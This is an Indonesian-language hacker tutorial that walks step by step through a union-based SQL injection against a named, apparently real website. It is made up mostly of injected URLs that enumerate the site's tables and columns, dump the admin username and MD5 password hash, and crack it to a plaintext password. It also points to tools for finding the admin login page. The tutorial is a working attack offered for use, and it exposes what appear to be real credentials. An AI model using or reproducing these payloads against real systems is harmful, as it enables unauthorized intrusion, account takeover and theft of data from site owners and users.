~~~ SQL Injection Tutorial by bL4cK HoLeS & Crash Overload ~~~
Pertama cari target yg mengandung bug's atau situs2 VULN...disini target kita adalah
" http://www.dpsmbd.com "
Contoh:
http://www.dpsmbd.com/newsdetail.php?id=1 <--- nampak biasa ( lalu beri tanda string (') di belakang'a...)
menjadi :
http://www.dpsmbd.com/newsdetail.php?id=1' <--- muncul error SQL ( berarti situs ini VULN )
setelah itu mulai mencari jumlah urutan table dengan order by ( dalam beberapa kasus order by tidak akan berfungsi...)
Contoh :
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 2-- <-- beri tanda min (-) didepan dan tanda (--) dibelakang sebagai maksud pembuka dan penutup,
jika situs masih tampak normal silahkan lanjutkan sampai menemui halaman yg error.
Misalkan :
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 2--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 3--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 4--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 5--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 6--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 7--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 8--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 9--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 10-- <-- ternyata yang ini muncul error
Selanjutnya melakukan colomn count dengan UNION SELECT menggunakan angka hingga keluar daftar angka didalam situs tersebut....
Contoh :
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1-- <--- angka belum keluar
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4-- <--- angka belum keluar
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5,6--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5,6,7--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5,6,7,8--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5,6,7,8,9-- <-- Keluar angka'a...ternyata angka 3 dan 4
Setelah tau angka apa saja yg keluar, kita tinggal mencari daftar table'a...dan menaruh group_concat(table_name) di urutan nomor yg tadi keluar
dan menaruh "from information_schema.tables where table_schema=database()--" diakhir angka jumlah table tersebut " berarti 9 "
contoh :
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=database()--
jika keluar daftar table'a...pilihlah table mana yg ingin kita exploitasi...Misalkan kita pilih table "admin"
untuk mencari nama kolom didalam table admin, terlebih dahulu kita merubah/meng convert text "admin" kedalam Hexadecimal
ke situs http://www.string-functions.com/string-hex.aspx
hasil hex dari admin = 61646d696e setiap hexadecimal diawali dengan 0x...dan menjadi 0x61646d696e
lalu tambahkan
limit 1,1--
limit 2,1--
limit 3,1--
limit 4,1--
Fungsi'a untuk mengetahui nama kolom dari table yang dimaksud.
contoh:
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e limit 1,1--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e limit 2,1--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e limit 3,1--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e limit 4,1--
Berikut nama2 kolom dari hasil exploitasi..
limit 1,1-- <-- nama kolom " id "
limit 2,1-- <-- nama kolom " user_name "
limit 3,1-- <-- nama kolom " pass_word "
limit 4,1-- <-- nama kolom " admin_email "
yang akan kita exploitasi selanjutnya adalah isi dari nama kolom " user_name " dan " pass_word "
contoh :
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,group_concat(user_name,0x3a,pass_word),4,5,6,7,8,9 from admin--
atau bisa juga satu per satu dengan cara memisahkan nama kolom
contoh:
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,user_name,4,5,6,7,8,9 from admin-- <--- untuk melihat username
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,pass_word,4,5,6,7,8,9 from admin-- <--- untuk melihat password
Maka keluarlah isi dari kolom tersebut, dengan isi :
superadmin@dps.com:44771849be55a878c9651a1794308cf5
yang berarti :
user_name = superadmin@dps.com
pass_word = 44771849be55a878c9651a1794308cf5 <--- HASH MD5
karna password'a masih berbentuk hash...maka anda decrypt terlebih dahulu hash tersebut ke http://www.md5decrypter.co.uk/
dan akan ditemukan hasil'a menjadi :
password = DPSmbd
setelah mengetahui username dan password'a, tugas anda selanjutnya adalah mencari login page admin dari situs tersebut.
silahkan gunakan tool finder page admin atau menggunakan jasa online ke http://sc0rpion.ir/af/
Semoga yg mengirim permintaan ini menjadi lebih paham...hehehehee...:)
Salam Opensource,
by bL4cK HoLeS....
idr666.tk & ardiandian.co.cc
About the Author
0Great Comment!